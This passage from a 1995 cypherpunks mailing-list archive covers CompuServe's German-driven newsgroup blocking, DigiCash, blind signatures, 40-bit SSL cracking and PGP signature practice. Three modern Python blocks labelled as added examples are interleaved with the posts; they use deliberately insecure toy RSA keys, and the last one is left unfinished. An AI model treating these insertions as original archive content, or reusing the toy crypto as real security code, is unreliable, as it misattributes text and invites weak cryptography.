moved from centralized hardware to decentralized software. 
 
We're seeing a growing dystopian world where national entities and
non-governmental organizations all seek to enforce their particular
cultural/political/economic/etc. biases on the global internet. I believe
this process will continue for some period of time. 
 
At the same time we may (and I think likely will) see aspects of the net
broken down into widely geographically separated locations that
simultaneously have no more effect on end users than the floor at the
central library on which the book we want resides. E.G. we'll use Denmark
to get "alt.sex.granny.gum-jobs," ftp to Singapore for
"/warez/microsoft/win99/hack/" and to the Turcos Islands for
"data.finance.internal.morgan." 
 
We'll have all three open and on our monitor at the same time, passed
through a second-level ISP in some small country that decides there's
money in switching and will no more regulate data throughput than they
would try to hold hotel keepers responsible for the content of the phone
calls made by their tenants. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Sat, 30 Dec 1995 06:17:54 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring"
Message-ID: <v01530500ad09cf23590b@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


This is a resend of a reply to Tim May's message on the CI$/Bundsweiser
Republic/alt.nekkid.hitler.youth controversy. The Cypherpunks mailer didn't
enjoy my attempts at humor in the headers...


------------

Tim May wrote:

>At 4:52 PM 12/28/95, Cees de Groot wrote, speaking of Compuserve's recent
>dropping of many newsgroups in response to demands by German prosecutors:
>
>>I won't start to comment on the style of this message. The term "Suitspeak"
>>comes to mind.
>
>Perhaps it is "Suitspeak," but it is not "censorship."
>
>Or, more precisely, it is fear that government laws will be used to
>sanction the service.  Thus, it is the government of Germany in this case
>which is "censoring." ("Censor" and "censorship" are notoriously overloaded
>terms, of course.)

It's a political problem.

This demonstrates the basic problem with tolerating monopolies in this
industry. When governments interfere, everyone subscribing loses, which
means most of the people in the audience for the service lose.

Unfortunately, there are no technological fixes (in the short term) for
monopolies. The Schumpeterian cycle is too long for the time horizons
engendered by the German government's actions or the Exon/Gorton/Hyde
language. You have to fight monopolies on the political arena as well as
the technical (remember how the WWW was going to liberate all of us on its
own? Until the elites recognized people wouldn't be watching Microsoft ads
*conspiratorial wink*.)

If I were a compuserve user, complain to your nearest German consulate and
call your congresscritter. Those GOP types will have a field day condemning
"euro-data-imperialism" during special order speeches on C-SPAN.

Support your local ISP.

Bill Humphries

PS: If only the Germans worried about Nazis during the Nuremberg trials
the way they worry now, maybe they wouldn't be facing their current plague
of nativist/skinhead problems.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 30 Dec 1995 06:17:55 +0800
To: cypherpunks@toad.com
Subject: (fwd) DigiCash licencing?
Message-ID: <v02120d02ad09c4936a9f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Organization: Digiturg
Date: Fri, 29 Dec 1995 17:32:10 +0200 (EET)
From: Jyri Kaljundi <jk@digit.ee>
To: ecash@digicash.com
Subject: DigiCash licencing
Mime-Version: 1.0
Sender: owner-ecash@digicash.com
Precedence: bulk
Reply-To: ecash@digicash.com


Does anyone know about the terms and costs of licencing ecash software? I
have tried contacting DigiCash directly with these questions, but have
got no answers :(

And who and where are already implementing ecash? Mark Twain Bank and
Swedish post are two I know of, what about the others?

Our company is very interested in using ecash here in Estonia, but
somehow DigiCash does not seem to allow that.

With all the best,

Juri Kaljundi, managing director, DigiMarket
jk@digit.ee

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 30 Dec 1995 06:51:13 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Proxy/Representation?
In-Reply-To: <199512290017.SAA00619@cdale1.midwest.net>
Message-ID: <199512291752.MAA11504@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"David E. Smith" writes:
>That's more of what I was looking for.  I suppose that (I'm still using
>PGP as my example) there could be a shared PGP key, signed by Helen and
>myself, where only the two of us know the passphrase, with a keyid of
>"David Smith <dsmith@midwest.net> on behalf of Helen Jones <helen@devnull.org>"
>or something similar.  The obvious problem is that in sharing the pass
>phrase the security is weakened.  (Paranoid threat model: at some point
>we have to decide on the pass phrase, and we are videotaped/bugged/spied
>upon while this takes place.)

Why bother with the shared key?  You need a message from Helen describing
the powers with which you are invested, signed by her key.  The wonderful
thing about data is that copying it is virtually free.  When you issue an 
order on her behalf, include a copy of the signed PoA, and sign the whole
thing with your key.
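
The signed power-of-attorney scheme described above, as an added example that is not part of the original post. It assumes details the post does not give: the PoA names the delegate's public key and lists the granted powers, and a toy RSA signature built from small fixed primes stands in for PGP signatures (illustrative only, not secure).

```python
import hashlib
import json

E = 65537  # public exponent shared by the toy keys


def keypair(p, q):
    """Toy RSA key from two fixed primes: returns (modulus n, private d)."""
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def digest(data, n):
    """SHA-256 of data reduced mod n (toy padding, not a real scheme)."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data, n, d):
    return pow(digest(data, n), d, n)


def verify(data, sig, n):
    return pow(sig, E, n) == digest(data, n)


def canon(obj):
    """Canonical bytes for signing: JSON with sorted keys."""
    return json.dumps(obj, sort_keys=True).encode()


def grant(grantor, delegate, delegate_n, powers, grantor_key):
    """Grantor signs a PoA binding the delegate's key to a list of powers."""
    poa = {"grantor": grantor, "delegate": delegate,
           "delegate_key": delegate_n, "powers": sorted(powers)}
    return {"poa": poa, "poa_sig": sign(canon(poa), *grantor_key)}


def issue(action, detail, signed_poa, signer_key):
    """Build an order that embeds the signed PoA, then sign the whole thing."""
    order = {"action": action, "detail": detail, **signed_poa}
    return order, sign(canon(order), *signer_key)


def verify_order(order, order_sig, grantor_n):
    """The verifier needs only the grantor's public key as a trust anchor."""
    poa = order["poa"]
    if not verify(canon(poa), order["poa_sig"], grantor_n):
        return "bad PoA signature"
    if not verify(canon(order), order_sig, poa["delegate_key"]):
        return "order not signed by the named delegate"
    if order["action"] not in poa["powers"]:
        return "action outside granted powers"
    return "valid"


# Constructed keys from Mersenne primes; far too small and structured for real use.
HELEN = keypair(2**127 - 1, 2**107 - 1)
DAVID = keypair(2**89 - 1, 2**61 - 1)
MALLORY = keypair(2**31 - 1, 2**19 - 1)


def demo():
    """Run one honest order and three misuse cases against the same PoA."""
    poa = grant("Helen", "David", DAVID[0], ["place-order"], HELEN)
    out = {}
    order, sig = issue("place-order", "100 widgets", poa, DAVID)
    out["delegate, in scope"] = verify_order(order, sig, HELEN[0])
    order, sig = issue("sell-house", "constructed address", poa, DAVID)
    out["delegate, out of scope"] = verify_order(order, sig, HELEN[0])
    # Copying the PoA is free, so a third party can attach it to their own order.
    order, sig = issue("place-order", "100 widgets", poa, MALLORY)
    out["copied PoA, other key"] = verify_order(order, sig, HELEN[0])
    # The delegate widens the powers after Helen signed.
    widened = {"poa": {**poa["poa"], "powers": ["place-order", "sell-house"]},
               "poa_sig": poa["poa_sig"]}
    order, sig = issue("sell-house", "constructed address", widened, DAVID)
    out["PoA edited after signing"] = verify_order(order, sig, HELEN[0])
    return out


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case}: {verdict}")
```

No passphrase is shared at any point: Helen's private key signs only the PoA, and David's private key signs only the orders.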




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 30 Dec 1995 07:12:24 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: blind validation
In-Reply-To: <199512290144.RAA28654@jobe.shell.portal.com>
Message-ID: <199512291816.MAA09405@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Chaum's way around it was basically to have some mechanism to give
> each person a unique number of some special form.  There doesn't have
> to be any agency who knows what number each person has (in fact, there
> isn't, in his scheme), but there is a mechanism to assure that one
> person does not get two numbers.  This is sometimes loosely referred to
> as an "is-a-person" credential (although in this specific context it is
> not actually a credential, just an identifier).

If I understand you correctly, this protocol allows Alice to create one and
only one nym that can't be connected to her real identity.  All of 
Alice's transactions can be linked together and to that nym, but there's 
no way to tag Alice with them.

The main difficulty I see with this protocol is that if things go wrong,
they go very wrong.  If Alice slips up once, or if she's compelled to give
herself up, then she loses everything and gets tagged with all of her
transactions.

Does anyone have a pointer to Chaum's paper?

[...]

> So the result in effect is to make it difficult to give away just a
> validation, without also giving away the ability to act as you.  Here
> is an idea about another way to achieve the same thing, closer to
> Alex's example:  Alice gets a blind validation as Alex describes based
> on a simple blind signature.  (Alice hands a blinded number to Bob, he
> signs it, Alice unblinds it, and uses the resulting signed number as
> the validation to, say, access Bob's files.)  We add that Alice puts,
> say, $100 into "escrow", encrypting it with the secret number and
> putting it on some public server.  She proves to Bob that she has done
> this using cut and choose.
> 
> Now if Alice gives away her secret number, anyone using it will be able
> to access Bob's files, but they can also get the $100.  So now it costs
> something for Alice to give away her secret.
> 
> (There are some major problems with this idea, the worst being that Alice
> can extract and spend the $100 right after proving to Bob that she is
> doing what she said, and before publishing her number.  Maybe someone
> could think of some fixes.)

This is a good idea because it addresses one of the big problems with my
protocol, the impossibility of introducing latency. 

But apart from the problem you mentioned above, isn't there a problem with
setting the escrow amount?  Ordinarily, we'd want to set the amount just 
high enough so that Alice doesn't have any interest in cheating.  
Whatever benefit Alice gains will be offset by the penalty.

How do we put a numeric value on the benefits Alice gets from cheating? 
Don't we create a situation in which a rich guy might be perfectly
comfortable with the risk of losing the money, while someone else might
not?
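
The blind-signature step in the quoted proposal (Alice hands a blinded number to Bob, he signs it, Alice unblinds it), as an added example that is not part of the original message. It uses textbook RSA blinding with a toy key built from fixed Mersenne primes, and goes one step further than the text by showing why Bob's signing log cannot be linked to the validations later presented; the escrow and cut-and-choose parts are not modelled, and all names are assumptions.

```python
import hashlib
import secrets
from math import gcd

# Bob's toy RSA key (constructed from fixed Mersenne primes, not secure).
P, Q, E = 2**89 - 1, 2**107 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))   # Bob's private exponent


def h(token):
    """Hash Alice's secret number into the RSA group."""
    return int.from_bytes(hashlib.sha256(token).digest(), "big") % N


def random_r():
    """Fresh blinding factor; must be invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(token, r):
    """Alice: hide h(token) by multiplying with r^E."""
    return h(token) * pow(r, E, N) % N


def bob_sign(blinded):
    """Bob: signs whatever number he is handed; he never sees the token."""
    return pow(blinded, D, N)


def unblind(blind_sig, r):
    """Alice: divide out r to obtain an ordinary signature on h(token)."""
    return blind_sig * pow(r, -1, N) % N


def verify(token, sig):
    """Anyone: check the validation against Bob's public key (N, E)."""
    return pow(sig, E, N) == h(token)


def linking_r(blinded, token):
    """Bob: the blinding factor that would tie a log entry to a token."""
    return pow(blinded * pow(h(token), -1, N) % N, D, N)


def consistent_pairings(signing_log, tokens):
    """Count (log entry, token) pairs that are mutually consistent.

    For every pair there is a valid blinding factor, so the log gives Bob
    no way to tell which entry produced which validation.
    """
    count = 0
    for blinded in signing_log:
        for token in tokens:
            r = linking_r(blinded, token)
            if blind(token, r) == blinded and \
               verify(token, unblind(bob_sign(blinded), r)):
                count += 1
    return count


if __name__ == "__main__":
    alice, carol = b"alice-validation-0001", b"carol-validation-0002"  # constructed
    r_a, r_c = random_r(), random_r()
    log = [blind(alice, r_a), blind(carol, r_c)]      # all that Bob sees
    sig_a = unblind(bob_sign(log[0]), r_a)
    print("Alice's validation verifies:", verify(alice, sig_a))
    print("consistent pairings:", consistent_pairings(log, [alice, carol]), "of 4")
```
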






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 30 Dec 1995 07:23:11 +0800
To: cypherpunks@toad.com
Subject: Re: HRB Systems Data Storage Encryptor
Message-ID: <9512291814.AA29382@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald wrote:
> At 09:45 AM 12/26/95 +0100, Anonymous wrote:
> >Check out http://www.hrb.com/encryption/ssp.html, your
> >exclusive source of the Ultron Crypto-Engine (tm)
> 
> The web page proudly announces:
>   "is the only NSA-approved Type I data encryptor available today."
> 
> There are probably some people ignorant enough to regard that as
> a recommendation.
>James A. Donald

     What's the problem? If you're a contractor or agency looking to store
classified data, the NSA approval is essential. There's no pretence in
the ad that the NSA can't read it. It says:

"NSA provides necessary keying material for SSP3110 operation."

and 

"It is available to U.S. Government agencies, military organizations, 
 and defense contractors."

This is not a snake oil product ala "Power One Time Pad" (sic). It's
a real system, approved for use with classified data. I strongly doubt
that there are any known holes (with the NSA supplying the key material,
why should there be?)

Speaking for myself,
	Peter Trei
	trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 30 Dec 1995 07:36:16 +0800
To: vznuri@netcom.com
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <01HZDR1AL5S48Y55Y6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 28-DEC-1995 01:36:46.58

>= the list charter can ask for people to submit to various practices on
the honor system, such as not using pseudonyms. cryptoanarchists who
hate the idea of trust are of course going to object to the honor system,
because "that which cannot be enforced should not be prohibited".
----------------
	Does this last idea leave much doubt in anyone's mind that "Vladimir Z.
Nuri" is a Detweiler tentacle?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 30 Dec 1995 08:21:40 +0800
To: cypherpunks@toad.com
Subject: Re: CAV_ein
In-Reply-To: <199512291605.LAA15428@pipe4.nyc.pipeline.com>
Message-ID: <0T6DkDvcwapi@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ kudos once again to John Young for making the NYT material available]


>    The New York Times, December 29, 1995, pp. A1, D4.
> 
>    On-Line Service Blocks Access To Topics Called Pornographic
> 
>       Complaint by Germany Has Worldwide Impact
> 
>    By John Markoff

[big snip]

>    "In the future, every Internet operator will be subject to
>    local laws," said Eric Schmidt, chief technology officer
>    for Sun Microsystems Inc., a Mountain View, Calif.,
>    computer maker. "And software will be developed to provide
>    the appropriate local censorship."

Ick.  There's some truth in the first quoted sentence, but I fail to see
any censorship as "appropriate".  Does Mr. Schmidt swing much weight in
Sun's policy department?
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 30 Dec 1995 07:47:23 +0800
To: cypherpunks@toad.com
Subject: "Cybercrime" Article from Reuters
Message-ID: <01HZDS4NA1PC8Y55Y6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Most of what they claim to be looking for is stuff that most people
won't object to their countering. Still, if anyone spots a government agency
offering an "informant" email address, posting it so that we can send them lots
of stuff (i.e., all the "Make Money Fast" pyramid schemes) would seem to be a
good thing to do... it should occupy them so that they're doing things that are
useful.
	Cypherpunks relevance? Well, there is the mention of anonymity.
	-Allen

Reuters New Media
   
   _ Thursday December 28 6:31 AM EST _
   
Authorities Patrolling Cyberspace for Crime

   WASHINGTON (Reuter) - Crime on the Internet is now more than just
   dirty pictures.
   
   With millions of people and a fast-growing commercial presence in
   cyberspace, federal law enforcement authorities are struggling to
   crack down on wrongdoing in the new territory.
   
   They are hunting for bogus get-rich-quick schemes, weight-loss
   miracles, AIDS cures, credit-repair programs, investment scams and
   gambling. That's in addition to crimes such as trafficking in child
   pornography.
   
   ``The scams are the same. The way you investigate them is different,''
   said Lucy Morris, assistant director for credit practices at the
   Federal Trade Commission, which has staff attorneys monitoring the
   Internet.
   
   Just as they would on the street, these ``cybercops'' act on tips or
   they just patrol. The potential crime scenes are the Internet
   worldwide computer network, computer online services such as America
   Online and smaller computer bulletin boards.
   
   Cruising cyberspace as part of their work are employees with the FTC,
   the Securities and Exchange Commission, the Department of
   Transportation, the Secret Service, state attorneys general and state
   securities regulators.
   
   They can work at the office or from home.
   
   ``In some respects it's easier to find the violations because you
   don't have to leave the office,'' said Minnesota Deputy Attorney
   General Tom Pursell.
   
   But there are obstacles.
   
   Cyberspace offers criminals wonderful anonymity and law officers face
   ambiguous jurisdiction issues due to the global nature of the
   Internet, raising questions about whether new laws are needed to cope
   with the new medium.
   
   ``Now all you need is a computer, a telephone, a little bit of
   software, and you're in business,'' said Hubert Humphrey III, the
   attorney general of Minnesota who himself prowls cyberspace in search
   of wrongdoing.
   
   Authorities agree they have their work cut out. ``It's going to be
   very difficult,'' predicted Humphrey, whose state has been out front
   in tracking down wrongdoing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 29 Dec 1995 23:14:16 +0800
To: cypherpunks@toad.com
Subject: Chinese Cypherpunk quote  [NOISE]
Message-ID: <199512291320.OAA23382@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I see that some rants here are rubbing off on the folks who write
Chinese fortune cookies. In tonight's dinner, the cookie said:

The will of the people is the best law.

I wonder if we can get a couple thousand cookies sent to 
Congress with that message?

A.E.N.

or to T.C.M.....

Xmas_Troll





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 30 Dec 1995 07:51:53 +0800
To: cypherpunks@toad.com
Subject: Telecom Bill Rewrite
Message-ID: <01HZDSQB7MJ48Y55Y6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It looks like some political pressure will still be possible.
Definitely good news, especially since most of the methods for receiving
"banned groups" listed in the FAQ are through US sites.
	-Allen
 
   Reuters New Media
   
   _ Friday December 29 5:51 AM EST _
   
Dole, Gingrich Unhappy with Telecom Bill
   
   WASHINGTON (Reuter) - Top House and Senate Republican leaders
   expressed unhappiness Thursday with a proposed rewrite of the nation's
   communications laws amid signs the Republicans may seek changes in
   legislation circulating on Capitol Hill.
   
   ``There are a number of problems in the bill that could have been
   resolved in a different way,'' Senate Majority Leader Robert Dole told
   a news conference.
   
   The Kansas Republican, appearing with House Speaker Newt Gingrich,
   said there are ``three, or four, or five provisions'' GOP leaders
   ought to focus on, including what he described as a ``giveaway'' of a
   key part of the airwaves to broadcasters.
   
   The plan worked out by congressional negotiators proposes that in the
   future, when the government doles out licenses for high-definition
   digital TV, the Federal Communications Commission ``should'' limit
   eligibility to existing broadcasters.
   
   Critics have charged this would amount to a multibillion dollar
   giveaway of the airwaves to the broadcast industry and that the
   government could instead raise as much as $70 billion through a
   competitive auction of the digital spectrum.
   
   Last week it appeared the White House and congressional leaders had
   reached agreement on legislation to overhaul the 61-year-old
   communications laws, following weeks of work by House and Senate
   negotiators.
   
   The plan would tear down decades-old laws and permit telephone, cable
   and broadcast companies to invade each other's turf.
   
   But after Vice President Al Gore and some congressional leaders said
   they had achieved an accord, other Republicans began to balk at the
   proposal, saying no deal had been struck.
   
   The protests scuttled any chance the telecommunications bill would be
   completed this year.
   
   Among other things, Republicans expressed dissatisfaction with
   provisions to ease restrictions on the number of TV stations
   broadcasters could own, saying the plan did not go far enough.
   
   They also cited issues such as regulation of the Internet and a
   decision to drop language permitting greater foreign investment in
   telecommunications.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 30 Dec 1995 08:25:58 +0800
To: cypherpunks@toad.com
Subject: Massey, CEO of Compuserve, on Internet
Message-ID: <ad099b2f180210046cfa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
explaining how his company is "taking the high road by complying with the
laws of Germany" in removing access to 200 Usenet groups.

So, what happens when Saudi Arabia announces that Christian and Jewish
newsgroups violate their laws (I don't know this for sure, but I know that
Jewish and Christian temples and churches are strictly verboten in Saudi
Arabia).

And, think of the many countries which ban homosexuality, and so on.

An amazing cave. Massey seems to think that all of the other large ISPs
will fall in line and remove "illegal" newsgroups (illegal in any country
in which they have account holders).

I wrote a longer post on the issues last night, so I won't repeat those points.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Johnson second login <exabyte!mikej2@uunet.uu.net>
Date: Sat, 30 Dec 1995 15:53:34 +0800
To: Scott Brickner <gedora!uunet!universe.digex.net!sjb@uunet.uu.net>
Subject: Re: DOS - MD5 - Thanks
In-Reply-To: <199512282039.PAA21627@universe.digex.net>
Message-ID: <Pine.3.89.9512291505.C2697-0100000@gedora>
MIME-Version: 1.0
Content-Type: text/plain




A freestanding implementation of MD5SUM (compiled from that in the PGP 
distribution) for DOS is at
ftp://ftp.csn.net/mpj/public/md5sum.zip and on the Colorado Catacombs BBS 
at 303-772-1062.

I suggested to Phil Zimmermann that he should put this in the next PGP 
release along with the compiled DOS version of PGP, but there hasn't been 
a new release of PGP since then.

Happy New Year!
Mike Johnson
mpj@exabyte.com

#include <std_disclaimer.h>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 30 Dec 1995 09:01:36 +0800
To: cypherpunks@toad.com
Subject: CHU_chu   Search Engines, Branded Communities
Message-ID: <199512292107.QAA02245@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-29-95. FinTimes:

   "Engine of the superhighway" muses on search engines and 
   branded communities, and how their convergence will 
   barb-wire lecher Tio Web from wild-legger Tia Juana.

   CHU_chu













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Sat, 30 Dec 1995 09:23:23 +0800
To: cypherpunks@toad.com
Subject: Re: Chinese Cypherpunk quote  [NOISE]
Message-ID: <199512300011.QAA16526@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 12/29/95 +0100, Anonymous wrote:
>The will of the people is the best law.

Rrrr. Rrrrr... OKAY, I'm sure that's bait, but it's a (relatively) slow week
here at Netscapegoat. (Besides, I've apparently already set a precedent for
responding to tentacularly dangled carrots earlier this week with my
response to the C'punk Seal question.) So I'm throwing better judgment to
the wind and leaping straight for the soft pink throat of this taunt.

To reply simply: Wrong -- the will of the people is as fickle as the wind.
Follow the will of the people, and you run your country by following fads.
Mob rule and all that. We're in deep trouble if we ever get a true democracy. 

Sorry. Just had to respond.

--
MY opinions, thank you very much. 

Corey Bridges
Netscape Communications Corporation
home.netscape.com/people/corey

Action figure #35: "Jeff Weinstein, with real asbestos suit and
glow-in-the-dark magnetized target!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 30 Dec 1995 09:55:01 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Netscape 40-bit cracking. The new computing benchmark?
In-Reply-To: <Pine.BSD/.3.91.951229084345.18726A-100000@l0pht.com>
Message-ID: <30E488F1.1F51@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Weld Pond wrote:

  They (ICE) say that they actually ran Hal's SSL challenge.  I think
the mention of DES must have been an error on the part of Infoworld.

	--Jeff

> 
> From Infoworld Dec 25, 1995 page 3.
> 
> Netscape Commerce Server Security Broken
> 
> Integrated Computing Engines Inc. (ICE), in Cambridge, Mass. announced it
> has cracked the 40-bit DES [huh? not RC4] encryption in the Netscape
> Commerce Server.  Unlike a similar security break-in [talk about bad
> terminology] by a French university student last August, which required
> eight days, 120 workstations, and two supercomputers, ICE said it used a
> computer that cost $83,000 and compromised the World Wide Web server's
> security in 7.7 days. [Hey, what about the Cypherpunks crack that
> only took 31.8 hours?] Netscape Communications Corp. officials were not
> surprised by the security crack. "We've known that 40-bit encryption is
> breakable since we shipped the server.  That's the reason it's allowed to
> be exported," said company spokeswoman Rosanne Siino. "We need to keep
> lobbying to get rid of the U.S. government's 40-bit restriction on what
> can be exported."  Within the United States, Netscape sells products with
> 128-bit encryption.

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 30 Dec 1995 10:45:37 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape 40-bit cracking. The new computing benchmark?
In-Reply-To: <30E488F1.1F51@netscape.com>
Message-ID: <199512300151.RAA00995@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


ObPlug: Community ConneXion does not ship a 40-bit-crippled
server. (Apache-SSL)

> > surprised by the security crack. "We've known that 40-bit encryption is
> > breakable since we shipped the server.  That's the reason it's allowed to
> > be exported," said company spokeswoman Rosanne Siino. "We need to keep

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 30 Dec 1995 07:23:03 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: easy avoidance of PGP signature forgeries and reuse
In-Reply-To: <oTTsgD7w165w@bwalk.dm.com>
Message-ID: <Pine.BSD.3.91.951229172352.26978C-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain




    START <attila>

	I never paid much attention to the problem other than to avoid 
    it by forcing it --i.e. list the destination and the sender inside the
    signature block, thus:

    ----------------- BEGIN PGP SIGNED TEXT

    To: john doe <john@box.com>
    Newsgroups: sci.crypt
    From: jane roe <jane@topsey.turvey.com>
    Subject: that's all folks!

    John, don't darken my door during the Christmas holidays.

	Nevermore.

    jane

    ---------------- BEGIN PGP SIGNATURE

    ERTYUIKJBNM,./34567JM,./

    ---------------- END PGP SIGNATURE

	with e-mail, e-letters, direct faxes, etc. it is too easy to 
    ignore the courtesy header. From a standpoint of security, you have
    blown away each of the attacks outlined in your article insomuch as 
    the signature will not compute if the courtesy block is omitted.

	personally, I do not think PGP 3 should attempt to solve the 
    problem. Most of the headers involved are applied _after_ the message 
    leaves the mail program; and, PGP interfaces are virtually the same 
    as invoking an alternate editor, which gets you nothing.

    END <attila>


--
--------------------------------------------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)
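
The check a recipient could run under the convention described above, as an added example that is not part of the original message: once the signature over the text is known to be good, the courtesy headers inside the signed text are compared with the headers the message actually arrived under. Verification of the PGP signature itself is assumed to have happened already; the function name, the matching rules and the boss@example.com and alt.flame envelopes are constructed for illustration.

```python
from email import message_from_string
from email.utils import getaddresses


def _addrs(value):
    """Lower-cased set of mailbox addresses in a From/To header value."""
    return {a.lower() for _, a in getaddresses([value or ""]) if a}


def _groups(value):
    """Lower-cased set of newsgroup names in a Newsgroups header value."""
    return {g.strip().lower() for g in (value or "").split(",") if g.strip()}


def _subject(value):
    """Subject with runs of whitespace collapsed."""
    return " ".join((value or "").split())


def check_courtesy_block(envelope_headers, signed_text):
    """Return a list of mismatches between envelope and signed headers.

    signed_text is the text covered by an already verified signature.
    An empty list means the envelope agrees with what the signer wrote.
    """
    env = message_from_string(envelope_headers)
    signed = message_from_string(signed_text.lstrip("\r\n"))
    # A signed text without the block proves nothing about its destination.
    if not (signed["From"] and (signed["To"] or signed["Newsgroups"])):
        return ["signed text has no courtesy header block"]
    problems = []
    if _addrs(env["From"]) != _addrs(signed["From"]):
        problems.append("From: envelope sender is not the signed sender")
    if _subject(env["Subject"]) != _subject(signed["Subject"]):
        problems.append("Subject: envelope subject is not the signed subject")
    # Every destination on the envelope must be one the signer listed.
    for extra in sorted(_addrs(env["To"]) - _addrs(signed["To"])):
        problems.append(f"To: {extra} is not a signed recipient")
    for extra in sorted(_groups(env["Newsgroups"]) - _groups(signed["Newsgroups"])):
        problems.append(f"Newsgroups: {extra} is not a signed newsgroup")
    return problems


# Signed text taken from the message above (indentation removed).
SIGNED_TEXT = """\
To: john doe <john@box.com>
Newsgroups: sci.crypt
From: jane roe <jane@topsey.turvey.com>
Subject: that's all folks!

John, don't darken my door during the Christmas holidays.
"""

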